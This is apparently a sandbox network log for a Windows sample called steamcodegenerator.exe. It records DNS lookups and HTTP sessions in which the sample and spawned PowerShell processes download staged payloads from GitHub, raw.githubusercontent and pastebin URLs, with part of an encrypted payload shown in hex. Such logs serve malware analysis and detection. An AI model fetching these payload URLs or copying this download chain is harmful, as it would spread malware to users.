                                                                                                                        Oct 15, 2024 15:52:15.227530003 CEST6076553192.168.2.61.1.1.1
                                                                                                                        Oct 15, 2024 15:52:15.234906912 CEST53607651.1.1.1192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:34.911366940 CEST6000253192.168.2.61.1.1.1
                                                                                                                        Oct 15, 2024 15:52:34.918579102 CEST53600021.1.1.1192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.309659004 CEST5932753192.168.2.61.1.1.1
                                                                                                                        Oct 15, 2024 15:52:54.316939116 CEST53593271.1.1.1192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.509016991 CEST5224553192.168.2.61.1.1.1
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST53522451.1.1.1192.168.2.6
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Oct 15, 2024 15:52:13.591018915 CEST192.168.2.61.1.1.10x3d5cStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:15.227530003 CEST192.168.2.61.1.1.10x10dStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:34.911366940 CEST192.168.2.61.1.1.10x5278Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.309659004 CEST192.168.2.61.1.1.10xa5afStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.509016991 CEST192.168.2.61.1.1.10x7fbdStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Oct 15, 2024 15:52:13.598275900 CEST1.1.1.1192.168.2.60x3d5cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:15.234906912 CEST1.1.1.1192.168.2.60x10dNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:15.234906912 CEST1.1.1.1192.168.2.60x10dNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:15.234906912 CEST1.1.1.1192.168.2.60x10dNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:15.234906912 CEST1.1.1.1192.168.2.60x10dNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:34.918579102 CEST1.1.1.1192.168.2.60x5278No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:34.918579102 CEST1.1.1.1192.168.2.60x5278No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:34.918579102 CEST1.1.1.1192.168.2.60x5278No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:34.918579102 CEST1.1.1.1192.168.2.60x5278No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.316939116 CEST1.1.1.1192.168.2.60xa5afNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.316939116 CEST1.1.1.1192.168.2.60xa5afNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.316939116 CEST1.1.1.1192.168.2.60xa5afNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST1.1.1.1192.168.2.60x7fbdNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST1.1.1.1192.168.2.60x7fbdNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST1.1.1.1192.168.2.60x7fbdNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST1.1.1.1192.168.2.60x7fbdNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                        Oct 15, 2024 15:52:54.515860081 CEST1.1.1.1192.168.2.60x7fbdNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                        • github.com
                                                                                                                        • objects.githubusercontent.com
                                                                                                                        • raw.githubusercontent.com
                                                                                                                        • discord.com
                                                                                                                        • pastebin.com
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.649791185.199.109.133804372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 15, 2024 15:52:34.942439079 CEST223OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 15, 2024 15:52:35.551342964 CEST542INHTTP/1.1 301 Moved Permanently
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0
                                                                                                                        Server: Varnish
                                                                                                                        Retry-After: 0
                                                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:35 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdal2120121-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1729000355.484426,VS0,VE0
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Expires: Tue, 15 Oct 2024 13:57:35 GMT
                                                                                                                        Vary: Authorization,Accept-Encoding


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.649894172.67.19.2480420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 15, 2024 15:52:54.331157923 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: pastebin.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 15, 2024 15:52:54.937272072 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:54 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 167
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 15 Oct 2024 14:52:54 GMT
                                                                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d304ad6e924e7fb-DFW
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.649906185.199.109.13380420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 15, 2024 15:52:55.760896921 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 15, 2024 15:52:56.401554108 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0
                                                                                                                        Server: Varnish
                                                                                                                        Retry-After: 0
                                                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:56 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdfw8210152-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1729000376.326815,VS0,VE0
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Expires: Tue, 15 Oct 2024 13:57:56 GMT
                                                                                                                        Vary: Authorization,Accept-Encoding


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.649938172.67.19.24805576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 15, 2024 15:53:02.064939022 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: pastebin.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 15, 2024 15:53:02.705881119 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:02 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 167
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 15 Oct 2024 14:53:02 GMT
                                                                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d304b075e578788-DFW
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.649950185.199.109.133805576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 15, 2024 15:53:03.574775934 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 15, 2024 15:53:04.167843103 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0
                                                                                                                        Server: Varnish
                                                                                                                        Retry-After: 0
                                                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:04 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdal2120125-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1729000384.100886,VS0,VE0
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Expires: Tue, 15 Oct 2024 13:58:04 GMT
                                                                                                                        Vary: Authorization,Accept-Encoding


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.649711140.82.121.34436628C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:14 UTC124OUTGET /user-attachments/files/17267811/stm.txt HTTP/1.1
                                                                                                                        User-Agent: Downloader
                                                                                                                        Host: github.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2024-10-15 13:52:15 UTC940INHTTP/1.1 302 Found
                                                                                                                        Server: GitHub.com
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:14 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                        Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                        2024-10-15 13:52:15 UTC4070INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.649712185.199.111.1334436628C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:15 UTC549OUTGET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1
                                                                                                                        User-Agent: Downloader
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: objects.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:52:16 UTC654INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 39510
                                                                                                                        x-amz-id-2: 2yQ2hjkaXDvxiRk3rcYUbcQmpz6nFMYhmpjklQvgJQUZ7HPF7GoL4dKnLWTH17X0VLM2Ls+FV8IYEsqOEeoynn+pEgQuH/LQmd2pAS+mRBE=
                                                                                                                        x-amz-request-id: QHWNM55YC6JSNR9P
                                                                                                                        Last-Modified: Sun, 06 Oct 2024 01:36:28 GMT
                                                                                                                        ETag: "ebe145bd87e74b4bca45e87525372f04"
                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                        Content-Disposition: attachment;filename=stm.txt
                                                                                                                        Content-Type: text/plain
                                                                                                                        Server: AmazonS3
                                                                                                                        Fastly-Restarts: 1
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:16 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        Age: 0
                                                                                                                        X-Served-By: cache-dfw-kdal2120085-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 1
                                                                                                                        X-Timer: S1729000336.918007,VS0,VE169
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: e8 c0 65 00 00 c0 65 00 00 30 67 fb 70 e1 b3 31 b0 2e b5 c0 c2 3e c6 7f 45 9e 24 2a b5 b3 fc 69 87 b4 31 b9 cf fd a7 fc 9b 00 00 00 00 59 44 28 d3 e2 80 68 27 40 df f0 62 05 d0 2d 15 53 21 d4 23 68 7a fa 8d 54 32 e8 58 21 3b 59 73 db 4e a8 6d 30 64 79 44 3b 64 39 ac 78 ac b7 08 b3 ff 58 b7 ae 65 c1 1b 53 f6 f7 5f dd f5 44 26 67 2a 27 5a 47 11 fe 7a 9e 07 29 6f 83 4d b7 28 43 da ee 40 b8 03 9a 38 06 be 48 31 95 be c3 d4 88 c3 8c e6 83 eb d1 53 78 5b 0b 5e 55 04 46 cc 4e 65 38 3b 49 43 10 03 ca e1 a2 2d df d0 bc 35 4f 75 61 fc 05 c6 7c 8a 1d 78 37 54 d1 a2 6d 3f 48 2f 7e e9 c2 7e c6 a3 c5 0b 39 5e d5 b0 85 10 e5 b5 ea 0b 98 71 df 75 26 f9 c0 1f c7 0c 55 25 3d 37 1e ca 5d e1 d3 4a cf bc 71 91 49 70 dc 26 7b b0 34 8d b3 5b ec 0f a5 16 dc b1 f5 bd 60 e3 de 65
                                                                                                                        Data Ascii: ee0gp1.>E$*i1YD(h'@b-S!#hzT2X!;YsNm0dyD;d9xXeS_D&g*'ZGz)oM(C@8H1Sx[^UFNe8;IC-5Oua|x7Tm?H/~~9^qu&U%=7]JqIp&{4[`e
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 60 3f 3a 33 42 27 66 1c 25 78 e9 6b 72 b1 87 8e a6 23 a3 99 44 fe 86 2c 3f 6a ab 95 b6 36 cb d6 05 89 ee e6 b7 21 c3 f8 da 6a 53 e8 d2 45 86 51 73 a4 a0 78 17 ce 14 9e 7f 05 d4 2e dc 14 bf 4b 26 66 21 2e 10 08 81 ef 86 96 55 fb bb db e9 db 3a c4 77 74 5e 71 bb 43 b7 67 5e 12 2f 00 69 29 31 df c3 51 9d 93 c4 e0 10 4d b5 91 8d 3d e3 c1 38 63 03 0b 3b dc 50 8a f4 f7 7b 8c 3b 94 83 9c fb f3 fb e7 1a 29 f0 3b 23 c4 76 fe 6e 48 2a 55 73 64 1b 63 c7 0f e1 d8 1d 6a a5 9c 6c 27 cd bb 88 2d b1 aa c0 41 8e 1b eb e5 4f ca b7 08 d5 53 0f b2 38 09 26 4e d1 b0 1f 0a a0 32 76 c4 ab 9a cc fb 5b 10 00 05 13 fb 74 61 8c e9 f0 be 5e 92 75 a1 bb 95 41 23 67 fe 3b c2 29 05 9d 9f 46 f9 f2 c1 99 c0 a4 54 1a 34 8d aa b8 db 31 14 57 92 cf d9 55 ab da 66 f8 fc a2 6c 2f 08 3a 6b d5
                                                                                                                        Data Ascii: `?:3B'f%xkr#D,?j6!jSEQsx.K&f!.U:wt^qCg^/i)1QM=8c;P{;);#vnH*Usdcjl'-AOS8&N2v[ta^uA#g;)FT41WUfl/:k
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 51 36 53 e6 ca 9d b9 7b 3d a3 3c 6f 0f ac e9 73 bf e1 45 30 cf 78 83 01 ba e5 1d d8 b6 12 48 a2 41 5f 72 23 6b dd a6 f6 3a a0 48 f7 24 94 44 8e 62 1e 7a eb ee 28 a0 47 5e 5d bd de 6f 3d 7a db 7e 4f 7b da 2b 47 81 ed 36 77 59 61 c4 b3 30 3c 3c 50 a1 c5 73 ba 16 32 15 56 bd cf a1 57 8d c5 ea 86 6d 14 d9 f7 3e a5 f9 68 2c f6 09 6d 5e f7 b2 e2 7a cc 02 50 51 f9 a0 db 52 06 dd 0d a0 7d 82 92 e7 f6 1b 25 21 0d 91 eb e4 4e fe 09 c6 ef 5e 0d 29 e0 9f f8 7a b4 d8 79 d8 74 75 d2 e8 38 65 0b 4f 22 58 2f c5 5d a7 23 35 52 89 76 ff e4 d0 d1 62 fc 29 41 2b 47 a1 33 2b 14 26 97 63 7a 5a 37 dc 18 f6 1b a4 8a 05 0f ab fb 51 ac b7 36 83 f1 da e9 57 d1 95 78 ca 20 a8 e1 75 61 67 17 3f e3 00 8d 05 5f 58 aa 0d bd c7 13 e4 8e 96 29 e7 ac c7 48 66 30 b3 de 6f 2e 98 67 65 48 d1
                                                                                                                        Data Ascii: Q6S{=<osE0xHA_r#k:H$Dbz(G^]o=z~O{+G6wYa0<<Ps2VWm>h,m^zPQR}%!N^)zytu8eO"X/]#5Rvb)A+G3+&czZ7Q6Wx uag?_X)Hf0o.geH
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 72 c8 89 86 8a ec 93 d4 5b 5b 14 b2 7c ba 8c 56 98 64 eb 7b ea 6e 8d bc e6 6d 7a 53 b4 b7 ce 60 28 87 94 8f c4 55 5b 51 e7 d3 27 14 d4 47 c3 6b cd 49 37 ef 06 21 b7 a3 0b ea 94 d6 81 e8 7a b2 ae ff 36 6c 73 d2 f2 db 78 d1 d1 3a 0a 77 93 59 4b 6f fd 8c e4 51 69 9c 17 bc 5a 6b b1 0a a9 38 d7 c6 33 d2 d1 66 22 05 7a 3d 28 d0 c0 5e 5d cc 50 3d 8d a5 6a 55 8e 9b 9c 94 9c 5e 4e 3c 43 80 07 f5 4a 1a 11 b6 c1 ac b0 e2 3e 7d 83 61 18 bd b7 79 77 8c 40 78 48 b9 d7 47 61 f4 02 03 7c 48 c3 d0 d3 d0 0a 18 8d e7 17 09 7a 36 50 25 3b 20 e1 45 bd 30 15 d4 0b 58 fc 31 67 ff 5e bc dc 7f 47 60 0a 24 40 d6 4c 5d c7 1c 8e 4f 9c 60 4c a3 3f 52 c6 5d b1 e5 ef a3 f5 06 27 86 f9 dc 10 cb 12 9a 77 2d 2d 06 db 15 30 46 9f db 14 b9 3b 7b 3a 02 7e 04 51 79 c2 d3 41 07 53 2f d1 38 34
                                                                                                                        Data Ascii: r[[|Vd{nmzS`(U[Q'GkI7!z6lsx:wYKoQiZk83f"z=(^]P=jU^N<CJ>}ayw@xHGa|Hz6P%; E0X1g^G`$@L]O`L?R]'w--0F;{:~QyAS/84
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: bd 5f 2c ec 9a 58 4d 1f 05 1b 47 94 32 a5 2c 4e fc e2 3c 4a 8d cc f9 63 63 d3 80 64 5e 0f a1 aa f8 ab 1c b2 53 02 11 a3 60 9a ba 3f 7f 53 2f 18 de 69 0d f5 f4 04 2c 9f 55 03 67 1a a1 b4 a1 2a 12 a8 29 c5 e0 50 ac de bb 0e f3 a6 cb 06 a2 bf 31 bb 24 2e 72 6f 4f 35 05 07 e7 b5 ec 6f 7f be 0c 80 26 80 3f db 41 0d 4e 64 6e 8f e8 bd fc 99 a7 28 b9 8c e9 8e ac 22 8e ee 5c 23 28 af 1d 7a 58 25 fb f3 70 99 cb 45 4e cf 56 3b 16 5b 86 cc be 5d 44 57 2c 6b 78 78 6b 07 1a 05 18 9c 6f 63 4f 53 26 5d 12 bc b3 41 ac 74 fb e3 a5 00 94 eb ef 70 ed 76 d8 9a 07 af d1 c1 28 1e 81 42 0b 90 7c 05 ec 3f b0 0d d9 66 53 16 df dd 22 0a 15 0f 37 57 63 f6 a1 38 56 c6 79 84 d0 59 09 7d 96 48 66 05 b0 f6 13 f6 68 da 19 63 70 68 79 a9 30 c0 a8 b0 8e 8a 57 c2 ae a0 86 c3 39 53 60 34 de
                                                                                                                        Data Ascii: _,XMG2,N<Jccd^S`?S/i,Ug*)P1$.roO5o&?ANdn("\#(zX%pENV;[]DW,kxxkocOS&]Atpv(B|?fS"7Wc8VyY}Hfhcphy0W9S`4
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 15 c7 3a af 21 d7 01 99 91 92 8b ff ca dd 8b 42 c3 61 4e 62 52 3f e1 8b c7 b4 6d 43 a0 b6 44 e7 0a 25 51 01 49 ae 78 a3 b1 09 ae b9 39 71 cd f1 44 99 95 fd 76 b0 57 56 fc 10 01 18 c9 fe 77 06 38 d7 2e 07 82 19 ff 0e c3 d8 24 14 14 48 2d 21 7a cb 62 1e 2e 8b 66 92 bf dd cd 05 0c f8 ef 4f 1c 2e 2d bc 2f 45 0d 40 c2 2c db 8e 5a de c8 64 af cc cd 65 b0 e6 60 9f a5 d6 57 f3 30 88 be a0 e4 36 d6 1a e1 0a b3 cf 9f 6e 20 56 a7 cd c9 a7 49 96 b3 b2 59 ad 89 0b e2 88 94 a2 20 f5 79 ab 91 b3 cb e1 d3 88 60 54 eb 07 cf 15 3d 22 5d 38 27 3e 21 ac 15 a9 de aa 93 db 13 66 ed 54 c3 4c 01 31 6d ea 13 a2 e4 29 9b 3e db 98 c1 1c 12 0a 9f fc 97 77 3b 65 0d 3e fa 3e e6 ea e7 de 31 68 82 be 76 ee 01 e2 03 fd 9c 3f dd 2f 9f e8 f0 cd 20 b7 1b 82 ea 89 f5 d6 28 c2 77 ed 7b ad b0
                                                                                                                        Data Ascii: :!BaNbR?mCD%QIx9qDvWVw8.$H-!zb.fO.-/E@,Zde`W06n VIY y`T="]8'>!fTL1m)>w;e>>1hv?/ (w{
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: c0 4c 38 b7 2d 54 80 8f ad 07 ce 6c d7 6d 37 90 d0 2a 77 ab e0 c9 10 9e 68 6e ae 90 f1 6d d4 3a e3 2b 21 9c 6c 18 55 55 38 b8 13 eb 2e fd 17 e4 89 8e c3 93 61 19 cf 2e 1a 40 26 fa 95 f1 92 67 66 c7 94 9a 50 1f dc e9 68 1f d1 c9 54 78 32 53 48 b8 f0 da 9a b9 09 0c 0a 7f 51 71 5b 03 f1 e3 9c a0 28 96 58 00 b5 04 fb c4 cf db 3d aa 55 77 6d b8 b2 39 e0 61 b4 f2 e7 23 6d b1 a8 39 e0 92 3f 7f 2e 00 fc a0 34 46 80 d4 c5 0e 6a fe 5d 24 b2 5b 01 77 65 2d 59 bf 8b fe c3 e3 8e 45 5f da fa 65 98 0e 53 e8 32 d4 bd e8 5d 35 8a d0 ab 07 31 8d c8 3d 48 17 7a 53 d5 c4 4a a0 36 65 32 9b 8e 49 e2 c2 6f 21 65 dd 8d d3 1f 99 7f ef bc ff c1 8f 70 f2 08 bd f8 4e e7 72 48 a7 4f 86 b4 e1 37 d6 45 3a 26 84 da bc 21 b7 63 e7 38 56 65 f6 35 14 31 91 96 58 6c 5d 3d 6e 19 36 19 37 8c
                                                                                                                        Data Ascii: L8-Tlm7*whnm:+!lUU8.a.@&gfPhTx2SHQq[(X=Uwm9a#m9?.4Fj]$[we-YE_eS2]51=HzSJ6e2Io!epNrHO7E:&!c8Ve51Xl]=n67
